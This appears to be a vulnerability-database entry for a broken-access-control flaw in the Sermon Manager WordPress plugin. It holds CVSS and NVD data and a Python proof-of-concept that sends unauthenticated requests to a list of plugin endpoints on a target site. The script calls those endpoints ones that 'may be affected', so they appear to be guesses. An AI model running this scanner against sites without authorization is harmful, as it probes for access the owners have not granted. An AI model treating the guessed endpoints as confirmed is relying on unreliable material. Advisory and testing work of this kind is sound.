Security Vulnerability Report
中文
CVE-2025-63002 CVSS 5.3 MEDIUM

CVE-2025-63002

Published: 2025-12-18 17:15:55
Last Modified: 2026-04-23 15:34:56

Description

Missing Authorization vulnerability in wpforchurch Sermon Manager sermon-manager-for-wordpress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sermon Manager: from n/a through <= 2.30.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Sermon Manager for WordPress <= 2.30.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63002 PoC - Sermon Manager Broken Access Control # Affected: Sermon Manager for WordPress <= 2.30.0 # Type: Missing Authorization / Broken Access Control import requests import sys # Target WordPress site with vulnerable Sermon Manager plugin TARGET_URL = "http://target-wordpress-site.com" # Common endpoints that may be affected by missing authorization ENDPOINTS = [ "/wp-json/sermon-manager/v1/sermons", "/wp-json/sermon-manager/v1/preachers", "/wp-json/sermon-manager/v1/series", "/wp-json/sermon-manager/v1/sermons?per_page=100", "/?rest_route=/sermon-manager/v1/sermons", "/?rest_route=/sermon-manager/v1/preachers", "/wp-admin/admin-ajax.php?action=sermon_manager_get_sermons", "/wp-admin/admin-ajax.php?action=sermon_manager_get_preachers" ] def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-63002""" print(f"[*] Testing CVE-2025-63002 - Sermon Manager Broken Access Control") print(f"[*] Target: {TARGET_URL}\n") vulnerable = False for endpoint in ENDPOINTS: url = f"{TARGET_URL}{endpoint}" print(f"[*] Testing endpoint: {endpoint}") try: # Send request WITHOUT any authentication headers response = requests.get(url, timeout=10, verify=False) # Check if we get successful response with data (bypassing access control) if response.status_code == 200: try: data = response.json() if data and (isinstance(data, list) or (isinstance(data, dict) and len(data) > 0)): print(f"[+] VULNERABLE! Endpoint {endpoint} returned data without authentication") print(f"[+] Sample data: {str(data)[:200]}...") vulnerable = True except: # If JSON parsing fails but status is 200, might still be vulnerable if "sermon" in response.text.lower() or "preacher" in response.text.lower(): print(f"[!] Potentially VULNERABLE - endpoint returned content without auth") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected (as expected): {response.status_code}") else: print(f"[*] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") if vulnerable: print("\n[+] CONCLUSION: Target is VULNERABLE to CVE-2025-63002") print("[+] Recommendation: Upgrade Sermon Manager to version > 2.30.0") else: print("\n[-] CONCLUSION: Target may not be vulnerable or endpoints not found") return vulnerable if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63002", "sourceIdentifier": "[email protected]", "published": "2025-12-18T17:15:54.987", "lastModified": "2026-04-23T15:34:56.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wpforchurch Sermon Manager sermon-manager-for-wordpress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sermon Manager: from n/a through <= 2.30.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sermon-manager-for-wordpress/vulnerability/wordpress-sermon-manager-plugin-2-30-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}